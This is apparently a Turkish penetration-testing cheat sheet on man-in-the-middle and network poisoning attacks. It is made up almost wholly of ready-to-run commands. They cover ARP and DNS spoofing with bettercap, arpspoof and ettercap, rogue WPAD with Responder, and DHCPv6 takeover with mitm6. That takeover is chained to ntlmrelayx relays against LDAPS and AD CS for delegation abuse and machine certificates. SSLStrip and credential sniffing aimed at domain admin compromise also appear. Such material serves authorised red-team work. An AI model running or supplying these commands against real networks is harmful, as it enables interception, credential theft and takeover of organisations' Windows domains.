Skip to content

MITM & Ağ Zehirleme

ATT&CK T1557 difficulty: orta

Man-in-the-Middle (MITM / AiTM), saldırganın iki taraf arasındaki trafiğe araya girmesidir (T1557). Yerel ağda ARP/DNS zehirleme, WPAD ve IPv6/DHCPv6 suistimali en yaygın yöntemlerdir; NTLM relay ile birleşince kimlik ele geçirmeye döner.

- Kurban ile aynı L2 segment (veya ARP'ye erişim)
- IP forwarding; mümkünse ikinci arayüz / TUN
- Araçlar: arpspoof, bettercap, ettercap, mitm6, Responder, ntlmrelayx
- Üretim etkisi: kesinti riski — kapsam/zamanlama
Terminal window
sudo sysctl -w net.ipv4.ip_forward=1
Terminal window
sudo sysctl -w net.ipv6.conf.all.forwarding=1
Terminal window
sudo arpspoof -i eth0 -t 10.10.10.5 -r 10.10.10.1
Terminal window
sudo bettercap -iface eth0
Terminal window
> net.probe on
Terminal window
> set arp.spoof.targets 10.10.10.5
Terminal window
> set arp.spoof.internal true
Terminal window
> arp.spoof on
Terminal window
> net.sniff on
Terminal window
sudo ettercap -T -q -i eth0 -M arp:remote /10.10.10.5// /10.10.10.1//

ARP sonrası trafik sende; sniffing veya SSLStrip benzeri modüller (modern HTTPS’te sınırlı) uygulanabilir.

Terminal window
> set dns.spoof.domains login.hedef.local,*.hedef.local
Terminal window
> set dns.spoof.address 10.10.10.66
Terminal window
> dns.spoof on

Birçok Windows istemcisi proxy keşfi için WPAD kullanır. Responder -w ile sahte WPAD sunup NTLM auth isteyebilir:

Terminal window
sudo responder -I eth0 -wFd

Windows istemcileri sıkça IPv6’yı tercih eder; DHCPv6 ile saldırgan kendini DNS olarak atayabilir — LLMNR’den bağımsız çalışır.

  1. mitm6 çalıştır — istemcilere sahte DHCPv6 ile DNS ata:

    Terminal window
    sudo mitm6 -d hedef.local
    Terminal window
    sudo mitm6 -i eth0 -d hedef.local --ignore-nofqdn
  2. WPAD / relay ile birleştir — ntlmrelayx IPv6 dinlesin, LDAP(S)’e aktar:

    Terminal window
    sudo ntlmrelayx.py -6 -t ldaps://dc01.hedef.local \
    -wh attacker.hedef.local --delegate-access
    Terminal window
    sudo ntlmrelayx.py -6 -t http://ca.hedef.local/certsrv/certfnsh.asp \
    --adcs --template Machine
  3. Sonuç — makine hesabı kimlikleri, RBCD/delegasyon, sertifika tabanlı kimliğe bürünme, hesap ele geçirme.

Terminal window
Terminal window
sudo tcpdump -i eth0 -w mitm.pcap host 10.10.10.5
Terminal window
> set http.proxy.sslstrip true
Terminal window
> http.proxy on

mitm6 · IPv6

embedded tool
Generated command
sudo mitm6 -i eth0 -d domain.local
ARP spoof kurban ↔ GW
→ net-creds / pcredz cleartext
→ veya DNS spoof → phishing portal
mitm6 -d hedef.local
→ ntlmrelayx -6 ldaps --delegate-access
→ RBCD → DA etkisi